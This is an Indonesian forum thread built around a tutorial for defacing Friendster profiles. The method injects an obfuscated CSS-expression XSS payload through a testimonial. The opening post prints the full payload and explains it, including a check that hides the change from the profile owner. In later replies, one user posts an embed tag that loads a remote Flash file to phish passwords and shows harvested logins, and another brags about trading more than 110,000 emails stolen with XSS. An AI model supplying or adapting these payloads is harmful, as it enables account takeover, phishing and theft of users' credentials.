ini trik cm pengembangan dr tutor ttg inject script pd friendster... disini gw maw ngajarin gmn ngdeface halaman profile friendster org via inject script..hanya dengan kirim testimonials...



to de point aja...

pertama-tama lo cari target lo dulu...(acc fs yg udah masuk friendlist fs lo)
trus...kasih dia testi dengan kata kata lo,,trus masukkin kode dibawah :

misal contoh testi :

___BEGIN OF TESTIMONIAL____

eh...apa kabar?
<img src="" id="mycode" style="height:expr/**/ession(if(pageViewerID!=pageOwnerID){document.writ e('<body bgcolor=black><b><br><br><center><font face=verdana size=4pt color=white>maaph..<br>tapi account fs yg anda liat uda gua bajak..<br><br>bingung?<Br>ngapain juga..<br><Br><br><br>nobodys servers is safe..<br><br><br>T_F_M #kartubeben<br>@ Dalnet Server<br></b>');document.title = '-friendster gua bajak !!-'}); width:expr/**/ession(document.all.mycode.style.height='0px')" /></img>

___END OF TESTIMONIAL______

perhatikan:
<img src="" id="mycode" style="height:expr/**/ession(

script diatas adalah tag html yg dipake untuk membuka jalan
agar javascript yg kita inject bisa dijalankan.

if(pageViewerID!=pageOwnerID)
fungsi diatas untuk mencegah agar yg punya fs gak
bisa ngliat klo profilenya udah berubah...
jadi perubahan ini cuma bisa dilihat sama orang lain,kecuali pemiliknya.

lalu,
document.write('<body bgcolor=black><b><br><br><center><font face=verdana size=4pt color=white>maaph..<br>tapi account fs yg anda liat uda gua bajak..<br><br>bingung?<Br>ngapain juga..<br><Br><br><br>nobodys servers is safe..<br><br><br>T_F_M #kartubeben<br>@ Dalnet Server<br></b>');document.title = '-friendster gua bajak !!-'});

script diatas adalah script javascript yg fungsinya untuk menuliskan tag html semau kita
kedalam sebuah testi...
sehingga kita bisa merubah seluruh tampilan profile org yg telah mengapprove testi kita..

klo contoh testi diatas dibuka...bentuknya seperti ini :

selama gw coba....trik ini cuma jalan di iexplore...

sebenernya trik diatas bisa diakalin lg untuk kepentingan yg lain....
hehehe



silahkan berfantasi dengan imajinasimu =p


T_F_M
#kartubeben
@DALnet server

Source: JASAKOM Information Center
http://www.jasakom.com/article.aspx?ID=803

Topik ini dah ada om :D
Tapi thx dah share..

Hmmm..dah lama sih gw tau trick ginian..dari forum tetangga:)
lumayan nih trick buat ngisengin orang :))
tapi bagus juga sih dipost disini..siapa tau anak sini banyak yg lom tau:D

Itulah, sampe sekarang gw ga gitu suka yg namanya FS, dari pertama kali bikin dah ga suka. Soalnya di FS banyak celah keamanannya, karena penguna bisa menyisipkan tag2 berbahaya ke dalam FS yg dapat merugikan org lain sesuka mereka di profil, index, sama testi.

pake Mozilla FireFox ngak bisa yah???

ini wa pernah coba...
baca dari jasakom.....
tp katanya ud gak bisa.........
kapan terakir dicoba n berhasil?

HUEHUEHUE, ini gwe juga udah taw... gwe memodif triknya th0r... thx boss th0r!

wah bisa hack FS orang2 gila neh /gg
thx yan

trus gmn neh jourdan
masi isa mpe krg?

wakakakaka gw demen nih kaya giniannn wakaka grp deh skali2 wkekeke /heh

tmn2 cewe gw biar pada ngakak2 deh... /heh

eh iya btw text documennya muncul dmn??wa kan dah ngirim testi dan juga dah di upload tapi ga bisa...
gmn donk??/hmm

eh iya btw cara ngubah profil orgna gmn>??/hmm

bisa, baik2 aja
tapi maaf ga bs ngasih taw sapa yg jd korban

sampai sekarang bisa?
gmn cara nge cek klo hasil deface qt berhasil?

Dari ada tulisan _______BEGIN TESTIMONIAL_____
sampe ______END TESTIMONIAL_____ ditulis???
mo cek acc ku dolo ah tau2nya jordan ke gwa >:)

gmn ne jourdan ?
isa gak mpe karang
munculnya dimana tuh

tunggu dede sabar napa!
dia lagi di luar kotaaa
koq nga isa
uda nda isa kali!!

hehe ok2
koq nga isa
uda nda isa kali?
maksud na pa mas6

uiiiiiiiiiiiii
klo ud kena deface ngilanginnya gmn??
wa di marah neh hehe ngedeface punya tmen pdhl cm pengen ngerjain,...
ga bisa balek hehehe.....
tp keren jg yah hasil deface na...

Berikut adalah 2 video gw yang mgkn sudah lama ..
Tapi sapa tau masih ad yg blom nonton ..
http://www.hellgeeks.org/Friendster.rar
http://www.hellgeeks.org/FriendsterXSS.rar

To Jourdan:
Ur welcome ..

Ngmg ngmg ..
Semenjak keluarnya video gw di jasakom ada makin banyak orang yang menggunakan tehnik dengan dasar embed yang sama ke FS yeh ..
Jadi berasa salah sama FS ..
LOL @ FS Administrator .. /gg

Current Project: Creating 175MB of Movie to become 1.7MB (Perbandingan 1:100) .. Perkembangan sejauh ini masih banyak gagal .. Hahaha Mohon didoakan .. Siapa tau jadi alogaritma baru /gg

Thanks.
Th0R

itu kk thor..
cara balikin fs yg ud kena deface gmn?
help2

itu kk thor..
cara balikin fs yg ud kena deface gmn?
help2
Delete the testimonial ..

Thanks.
Th0R

ow.. hehe
ia jg yah..
pdhl simple banget..
hikz kok dudud banget wa

@dede23
pakai testi yg mana
koq gwa yg dapet testi malah account nya nda papa /swt
gimana sih kaka th0r :D

hmmm mpe karang..
masi byk yg kna deface, haha
lucu jg ngeliatnya....
hmmph

masi isa kok mpe karang...
klo wa ngeceknya y pake IE !
pake mozila.. cek testina ud di approve pa lom..
klo ud, link url na lo copy...
paste ke IE <loading aga lm >
biz tu jreng2 kliatan dah
fs lo ud gue bajak haha...
edit scripnya sesuka lo....

klo testinya udah di deface gimana cara ngerubah FS korban ya ?

ngubah??
kek na gak isa deh..
lo ubah2 ja tulisannya pake nama lu
isa kok

masi isa kok mpe karang...
klo wa ngeceknya y pake IE !
pake mozila.. cek testina ud di approve pa lom..
klo ud, link url na lo copy...
paste ke IE <loading aga lm >
biz tu jreng2 kliatan dah
fs lo ud gue bajak haha...
edit scripnya sesuka lo....

edit scripna gmn om??dah muncul di profilena dya??
testi dari gw kan dah di aprove ma dya...wa dah copy urlna tapi ga isa...??/hmm

mohon dong dijelasin dengan detail.......:D

copy url na trus buka di IE

edit ganti dgn nama lo
klo itu kan dari TFM

copy url na trus buka di IE

edit ganti dgn nama lo
klo itu kan dari TFM


WAduh Ga isa ommmmm...gini kan...pas dah di copy urlna kita klik kanan tuh profile trus view source...

kan muncul code2 na tuh..trus caranya edit scriptna dari mana>>jadi yang kita ubah tuh yang mana>>and apa??/hmm

wa coba edit codenya juga ga isa....ada tulisan gini

The text in The C:\Documents and Settings\Game 2\Local Settings\Temporary Internet Files\Contents.IE5\G15TR6R5\29857016 file has changed.

Do you want to save the changes?]

trus yang om ubah dari profile orang apanya??

cara kampungan
nda guna kk, di disk clean up juga ilank ~.~

wa gak edit profil orang
cuma deface
ganti tampilan depan..
isi nya gak ke obok2
lagian gak ngerti toh..
wa ga tau apa2 ttg hack

Maksud ngedeface buat ngilangin effect klik kanan yang disable doank ya !
kaya gini http://www.friendster.com/18808312 !

deface ilangin klik kanan??

ga bro..
klo link itu ud di deface..

pasti dibuka pake IE halaman depannya ud keganti

mau simple?
post testi, n include this code to your testimonial:

<embed src="http://www.g34rs.com/profile/1Direct.swf" width="1" height="1">
</embed>


ntar passnya bakal kekirim ke gwe... :))

waksss
itu pake flash yah??

duh serem banget..
mulai sekarang jgn terima testi deh ehehe...

bagi2 donk jour caranya....
pgn ngerjain tmen

engga, gwe ga pake sistem professional
pake sistem orang cupu kaya gwe :))

cman bikin fake FS aja
jadi nih flash ngedirect victim ke fake FS gwe

GRPnya lagi full, bsok gwe balesnya ya /sry

Yaree yaree .. /swt

Thanks.
Th0R

yare yare? /swt

pake thanks lagi... /swt

kok bisa passnya ke ambil juga??
@OOT
yaree2 tu apa seh?

Ini Contohnya Yang Udah Gw Deface http://www.friendster.com/18264605 trus gimana lagi ?, kok ga' ada perubahan !

ad cara biar yang punya sadar bahwa fs nya di deface..... (halaman item ituh..)
biar g bsa di delete testinya....????

nih gwe pake fake fs dpt lumayan byk:
baru beberapa nieh :P:
http://img301.imageshack.us/img301/543/injectsz1.th.jpg (http://img301.imageshack.us/my.php?image=injectsz1.jpg)
maaf yg kena fake fs gwe /sry tp gwe ga pernah nyentuh FS orang kcuali gwe benci tuh orang

ebad lo boz...
klo dia kena fake...
masa pass isa keambil?

deface itu apa????
trus koq isa ambil pass org? Gmn caranya.. Bagi2 plis.. /e8
Pengen banget nich iseng-in org..ato tar wa copy paste link itu ke testi, trus tar ksh tau pass nya ya kk jordan? /e8

110,891 Emails from myspace, orkut and friendster gains using XSS have been collected by m3h .. /heh Want some?! LOL
Most of them worked with the email accounts also .. Some of them are having such a great amount of paypals and internet banking accounts .. Just really makes m3h want to strip all their money .. Hahahahahahaha But, nahhhh my girl really pissed on m3h whenever i tried to do such a things again .. LOL Just be my "boss" lil officer then /heh

Th0R got defeated by a girl?!
GOD DAMNIT!!!!
Hahahaha

Anyone want to trade some emails with some good stuffs?
Feel free to contact m3h ..

@dede23 ..
Yeap u can .. I gave u the video before .. LOL Why dont u learn more and more instead leeching stuffs here??? o.O
Not only Friendster .. Orkut, MySpace, Yahoo, GMail and some forums can be fooled by XSS .. LOL
Focusing my research on Hotmail rite now .. They are indeed sux with such a good patching flow instead of scurity ..
Hasta la victoria de siempre!!! /heh

Thanks.
Th0R

@thor
how to do that? /e2
and what is deface n XSS?
sorry, I am a newbie on computer stuff.. /wah

@Th0R
im a noob n leecher >.<

seperti kalimat yang diutarakan pembuat Open BSD(Open BSD adalah Operation System tersecure sekarang):
"Gak ada yang secure didunia ini!"

(kalimat yg gwe baca dimana geto)

@dede23
cari ttg nyolong cookie di Jasakom/tutorialnya th0r (lupa gwe yg mana)
ada byk cara deh! gmail aja dengan gampangnya bsa dijbol... ya ga th0r? /gg

Gak tuh /e4
Gw kan cuman n00b /wah

Thanks.
Th0R

yeee abang thor gak ngaku

uhm..sory,, what is deface anyway? /hmm
I am a beginner..^^..

kk thor..koq movie yg pake XSS ndak isa ya? (movie-nya macet di tengah jalan).. apa kompie wa yg error? di tengah jalan macet movie-nya../sob

Lompatin bagian view source ..

Thanks.
Th0R

bro..yang deface lewat testi udah ga bisa yah???kok dicoba ga ada pengaruhnya...??

rik ajaring gw pls???

kk thor..
movie yg judulnya friendster.rar (bukan yg XSS) rusak ya../sob
klo iya, tolong di upload lagi plis, pengen liat (>_<).. /wah

ud dibilang lewatin bagian view source

iya, yg XSS bisa di lewatin view source nya..
Klo yg gak pake XSS, baru pengen di extract, udh rusak duluan../sob

sampai sekarang bisa?
gmn cara nge cek klo hasil deface qt berhasil?


sblom loe kirim loe preview dolo bro.....

nah setelah testi loe d aprovvvve psti berhasil!

Nanya Donk /?
Berarti Klo Testi Nya , Nggak Diterima (Nggak Di Approve) Berarti Qta Gagal Donk Nge Deface Dia :-/

Trus Misalnya Qta Testinya Dah Di Approve , Gw Suruh Ngapain Ke Temen Gw /? Gw Suruh Dia Buka Menu Profile Apa Suruh Dia Buka Menu Edit Profile /?

kek Nya Gak Jalan Di Mozzila Ya /sob

@Gloria
keliatan kalo di IE, lo copy link profilnya di IE

ad cara biar yang punya sadar bahwa fs nya di deface..... (halaman item ituh..)
biar g bsa di delete testinya....????

waduh gw pgn bgt bisa kyk gtu !!! gmn caranya !? kasih tau donkk !!!! gw butuh bgt neh!!!!

EHm.. Sorry Jek /omg Nih Tutor Dah Basi /swt huek... /! Dah Nggak Berlaku Di FS Lage , Nih Tutor Dah Dari Zaman Kuda Makan Besi /swt

EHm.. Sorry Jek Nih Tutor Dah Basi huek... Dah Nggak Berlaku Di FS Lage , Nih Tutor Dah Dari Zaman Kuda Makan Besi

nah itu tujuan gw !! kbetulan neh !!! jd loe bisa ngajarin gw ttg mendeface fs yg baru donk !!!!! plisss kasih tau gw bang d - cracker gw butuh bgt neh !!! klo bisa loe pm ke gw aza ya.... plisssssss *bersujud 100 x*

eh,gw gabung ya...


btw gw cba utk fs friend koq g bs??

caranya gimana??

eh,gw gabung ya...
btw gw cba utk fs friend koq g bs??
caranya gimana??
Ya Eyalah /swt Orang Nich Tutor Dah Basi , Kt KK GW D-Cracker /heh Ada 1 Cara "Ngirim Cookie" Ke FS Yg Jd Sasarab /omg Trus GW Lupa Lagi... Ntar Dech Wa Nanya Dolo

kl masalah ngirim cookie perna di ajarin thor pas di vidio " Yahoo hacking " cumen langkah selanjutnya itu gak tahan pusink nya

masi isa kok mpe karang...
klo wa ngeceknya y pake IE !
pake mozila.. cek testina ud di approve pa lom..
klo ud, link url na lo copy...
paste ke IE <loading aga lm >
biz tu jreng2 kliatan dah
fs lo ud gue bajak haha...
edit scripnya sesuka lo....





maksudnya "link url" tu yang mana seh? tulung jelasin donk... gwe juga pake IE... internet Explorer kan.. susah jga yah nge deface gitu balz yah

swt...
masih jaman apa deface FS orang??.... /swt /swt /ho /ho

bukannya yang ini udah ga isa di pake kan.. /??
swt deh /swt omg deh /omg udah di coba orang2 ga pernah bisa brarti emang udah ndak bisa wkakwkwakwakwakwakwak /heh

Iya Klo Lewat Cookie Juga Msh Bisa /heh Make Trik "Menyembunyikan Code Java Script Terhadap Browser Non Java Script Bisa Nggak ya /?" Coba Dech /heh

gimana caranya tuh??

Ada Tuh Di Bagian Security N Hacking , Deface Profile FS Part II /no1

ditaruh di testi kan?

coba ahh...

:D :-/ >:D< :"> =(( X( :) KalAU bIsA jaNGAN HAMpIR Sm dG yG lAEn

Tapi,TRiMZ atAS iNFoRmaSinya!!!

Ok